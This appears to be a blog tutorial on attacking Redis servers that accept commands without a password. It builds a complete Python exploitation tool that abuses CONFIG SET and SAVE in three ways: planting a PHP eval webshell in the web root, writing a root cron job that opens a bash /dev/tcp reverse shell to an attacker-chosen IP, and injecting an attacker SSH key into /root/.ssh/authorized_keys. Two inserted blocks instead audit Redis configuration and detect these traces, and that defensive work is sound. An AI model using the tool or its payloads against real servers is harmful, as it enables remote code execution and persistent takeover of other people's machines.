Detecting Redis Unauthorized Access with a Python Script

2024-11-4 22:29 | Posted by: db4d5a85


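1 Test environment setup

CentOS 7 (192.168.198.66/24): install the Redis server and start the service with root privileges, with protected mode turned off; install and start the httpd service; start the ssh service.

Kali (192.168.198.172/24): used to test the script, simulating the attacking machine.

Win10: VS Code for developing the script, Xshell for controlling the virtual machines.

2 Unauthorized access detection

First, check whether port 6379 is open. A plain socket connection test is enough; the is_port_open() function implements the port check.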

[code]
import socket

def is_port_open(host, port):
    # Attempt a TCP connection with a short timeout
    s = socket.socket()
    s.settimeout(0.3)
    try:
        s.connect((host, port))
    except Exception:
        return False
    else:
        return True
    finally:
        s.close()
[/code]

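Next, try to connect to the Redis server. This uses StrictRedis(host, port, socket_timeout) from the redis module and calls the client_list() method to fetch the client list as a check that the connection works. If the connection to the Redis server succeeds, the call to client_list() does not raise an exception. Because no password is supplied, a successful call means the server accepts commands from unauthenticated clients.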

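[code]
import redis

ip = '192.168.198.66'  # the CentOS 7 test machine from section 1
port = 6379

try:
    client = redis.StrictRedis(host=ip, port=port, socket_timeout=0.3)
    # client_list() only succeeds if the server accepts our commands
    ok_lst = client.client_list()
    print('[+] Connected to the Redis server successfully...')
except Exception as e:
    print(f'[-] An unexpected error occurred: {e}')
[/code]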
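The lab server in section 1 answers the probe above because protected mode is off and no password is set. As an added example (not part of the original article), the code below audits redis.conf text for the settings behind that exposure; the function names and both sample configs are constructed for illustration, and it checks only requirepass, not ACL users.

```python
import ipaddress
import shlex

def parse_redis_conf(text):
    """Return {directive: [args of each occurrence]} from redis.conf text."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = shlex.split(line)
        conf.setdefault(parts[0].lower(), []).append(parts[1:])
    return conf

def is_loopback(addr):
    try:
        # Redis 6.2+ allows a "-" prefix on optional bind addresses
        return ipaddress.ip_address(addr.lstrip("-")).is_loopback
    except ValueError:  # "*" or a host name: not provably loopback
        return False

def audit_redis_conf(text):
    conf = parse_redis_conf(text)
    findings = []
    # The last occurrence of a directive wins.
    pm = conf.get("protected-mode", [["yes"]])[-1]
    if pm and pm[0].lower() == "no":
        findings.append("protected-mode is off")
    # With no bind directive, Redis listens on all interfaces.
    binds = conf.get("bind", [["*"]])[-1]
    if not all(is_loopback(a) for a in binds):
        findings.append("listens on a non-loopback address")
    pw = conf.get("requirepass", [[""]])[-1]
    if not (pw and pw[0]):
        findings.append("no requirepass set")
    # Renaming CONFIG to "" disables the command the later sections rely on.
    renamed = {a[0].upper() for a in conf.get("rename-command", []) if a}
    if "CONFIG" not in renamed:
        findings.append("CONFIG is not renamed or disabled")
    return findings

# Constructed samples: WEAK mirrors the lab in section 1, HARDENED is the fix.
WEAK = "bind 0.0.0.0\nprotected-mode no\nport 6379\n"
HARDENED = ('bind 127.0.0.1 -::1\nprotected-mode yes\n'
            'requirepass "<long-random-secret>"\nrename-command CONFIG ""\n')

if __name__ == "__main__":
    for name, text in (("weak", WEAK), ("hardened", HARDENED)):
        print(name, audit_redis_conf(text))
```
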

3 Writing a webshell

Redis commands:

[code]
config set dir /var/www/html
config set dbfilename shell.php
set x "<?php @eval($_POST[123]); ?>"
save
[/code]

The corresponding methods of the redis module:

[code]
client.config_set('dir','/var/www/html')
client.config_set('dbfilename','shell.php')
client.set('x','<?php @eval($_POST[123]); ?>')
client.save()
[/code]

Add the ability to set the web root directory, the name of the one-line webshell file, and its password:

[code]
def Webshell(client):
    try:
        df_dir='/var/www/html'
        web_dir=input('Please enter the root directory of the target machine\'s website, input nothing to use the default path: /var/www/html\n')
        web_dir=web_dir.strip()
        if not web_dir:
            web_dir=df_dir
        name=input('Please enter the name of the PHP file you want to upload: ')
        passwd=input('Please enter the connection password: ')
        client.config_set('dir',web_dir)
        client.config_set('dbfilename',name+'.php')
        client.set('x','<?php @eval($_POST['+passwd+']); ?>')
        client.save()
        print("[+] Webshell "+name+".php"+" uploaded successfully...")
    except Exception as e:
        print(f"[-] Webshell upload failed: {e}")
[/code]

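4 Establishing a reverse connection

Likewise, a scheduled task (cron) is used here to obtain a reverse connection. First set the Redis database directory to the system cron directory and the file name to root (equivalent to modifying the root user's crontab), then add the ability for the user to set the IP and listening port.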

[code]
def Reverse(client):
    try:
        client.config_set('dir','/var/spool/cron')
        client.config_set('dbfilename','root')
        ip=input('Set the attacker\'s IP address: ')
        port=input('Set the listening port: ')
        payload='\n* * * * * bash -i >& /dev/tcp/'+ip+'/'+port+' 0>&1\n'
        client.set('x',payload)
        client.save()
        print("[+] Reverse shell task created successfully...")
    except Exception as e:
        print(f"[-] Reverse shell creation failed: {e}")
[/code]

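5 Passwordless login with SSH keys

Set the Redis directory to /root/.ssh and the save file to authorized_keys, so that the attacker's ssh public key is written into authorized_keys on the target machine.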

[code]
def Ssh(client):
    try:
        sshkey=input('Enter the SSH key you have generated: ')
        client.config_set('dir','/root/.ssh')
        client.config_set('dbfilename','authorized_keys')
        client.set('x','\n\n'+sshkey+'\n\n')
        client.save()
        print("[+] SSH key injected successfully.")
    except Exception as e:
        print(f"[-] SSH key injection failed: {e}")
[/code]
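Sections 3 to 5 all leave the same two traces: the server's dir and dbfilename no longer point at its own dump file, and the file that lands in the web root, cron directory or .ssh directory is an RDB dump that begins with the REDIS magic header. As an added example (not part of the original article), the code below checks for both; the function names, the expected data directory /var/lib/redis and the sample values are assumptions constructed for illustration.

```python
import posixpath
import re

# Directories the three methods in sections 3 to 5 point Redis at.
SENSITIVE_DIRS = ("/var/www/html", "/var/spool/cron", "/root/.ssh")
# An RDB dump starts with "REDIS" followed by a 4-digit format version.
RDB_MAGIC = re.compile(rb"^REDIS\d{4}")

def check_persistence(conf, data_dir="/var/lib/redis"):
    """conf holds the live 'dir' and 'dbfilename' values (CONFIG GET)."""
    findings = []
    d = posixpath.normpath(conf.get("dir", ""))
    name = conf.get("dbfilename", "")
    if d != posixpath.normpath(data_dir):
        findings.append(f"dir is {d}, expected {data_dir}")
    for s in SENSITIVE_DIRS:
        if d == s or d.startswith(s + "/"):
            findings.append(f"dir points into sensitive path {s}")
    if not name.endswith(".rdb"):
        findings.append(f"dbfilename {name!r} is not an .rdb file")
    return findings

def is_rdb_dump(head):
    """True if the first bytes of a file are an RDB header.

    An authorized_keys file, crontab or .php page should never match.
    """
    return RDB_MAGIC.match(head) is not None

# Constructed samples.
BASELINE = {"dir": "/var/lib/redis", "dbfilename": "dump.rdb"}
TAMPERED = {"dir": "/var/spool/cron/", "dbfilename": "root"}
RDB_HEAD = b"REDIS0009\xfa\x09redis-ver"      # start of a dump file
KEY_HEAD = b"ssh-rsa <constructed-key> user@host\n"  # a normal key file

if __name__ == "__main__":
    print(check_persistence(BASELINE))
    print(check_persistence(TAMPERED))
    print(is_rdb_dump(RDB_HEAD), is_rdb_dump(KEY_HEAD))
```

With redis-py, the conf dictionary can be built by merging the results of client.config_get('dir') and client.config_get('dbfilename') on an authenticated connection.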

6 Complete code

[code]
import numpy as np
import socket
import redis
import sys

def Hello_FK_Redis():
    a,b=60,30
    x,y,r=30,15,13
    img=np.zeros((b,a),dtype=str)
    for i in range(b):
        for j in range(a):
            dist=np.sqrt((i-y)**2+(j-x)**2)
            if r-1<dist<r+1:
                img[i,j]='*'
            elif abs(j-x)<1 and dist<r:
                img[i,j]='|'
            elif abs(i-y)<1 and dist<r:
                img[i,j]='-'
    img[img=='']=' '
    for i in img:
        print(''.join(i))
    print('----Welcome to use Redis Vulnerability Exploitation Tool----')

def is_port_open(host,port):
    s=socket.socket()
    s.settimeout(0.3)
    try:
        s.connect((host,port))
    except Exception as e:
        return False
    else:
        return True
    finally:
        s.close()

def Webshell(client):
    try:
        df_dir='/var/www/html'
        web_dir=input('Please enter the root directory of the target machine\'s website, input nothing to use the default path: /var/www/html\n')
        web_dir=web_dir.strip()
        if not web_dir:
            web_dir=df_dir
        name=input('Please enter the name of the PHP file you want to upload: ')
        passwd=input('Please enter the connection password: ')
        client.config_set('dir',web_dir)
        client.config_set('dbfilename',name+'.php')
        client.set('x','<?php @eval($_POST['+passwd+']); ?>')
        client.save()
        print("[+] Webshell "+name+".php"+" uploaded successfully...")
    except Exception as e:
        print(f"[-] Webshell upload failed: {e}")

def Reverse(client):
    try:
        client.config_set('dir','/var/spool/cron')
        client.config_set('dbfilename','root')
        ip=input('Set the attacker\'s IP address: ')
        port=input('Set the listening port: ')
        ip=ip.strip()
        port=port.strip()
        payload='\n* * * * * bash -i >& /dev/tcp/'+ip+'/'+port+' 0>&1\n'
        client.set('x',payload)
        client.save()
        print("[+] Reverse shell task created successfully...")
    except Exception as e:
        print(f"[-] Reverse shell creation failed: {e}")

def Ssh(client):
    try:
        sshkey=input('Enter the SSH key you have generated: ')
        client.config_set('dir','/root/.ssh')
        client.config_set('dbfilename','authorized_keys')
        client.set('x','\n\n'+sshkey+'\n\n')
        client.save()
        print("[+] SSH key injected successfully.")
    except Exception as e:
        print(f"[-] SSH key injection failed: {e}")

if __name__ == '__main__':
    Hello_FK_Redis()
    ip=input('Please enter the target machine\'s IP address: ')
    port=6379
    if is_port_open(ip,port):
        print('[+] Port 6379 is open...')
        print('[*] Trying to connect Redis server...')
        try:
            client=redis.StrictRedis(host=ip,port=port,socket_timeout=0.3)
            ok_lst=client.client_list()
            print('[+] Connected to the Redis server successfully...')
            print('Please choose the exploit method you want to use:\nEnter 1 for webshell\nEnter 2 for establishing a reverse connection\nEnter 3 for SSH key-based authentication\nOr any other character to exit...')
            try:
                c=int(input())
                if c==1:
                    Webshell(client)
                elif c==2:
                    Reverse(client)
                elif c==3:
                    Ssh(client)
                else:
                    print('[*] Exiting...')
                    sys.exit()
            except Exception:
                print('[*] Exiting...')
                sys.exit()
        except Exception as e:
            print(f'[-] An unexpected error occurred: {e}')
    else:
        print('[-] Port 6379 is not open...')
[/code]

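7 Test results

webshell

Reverse connection

Listening port: 7777

The attacker IP and port entered below must match the attacking machine and port that are listening:

Passwordless login

In Kali, copy the contents of the public key id_rsa.pub from .ssh

Passwordless login: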

Source: https://www.jb51.net/python/328429305.htm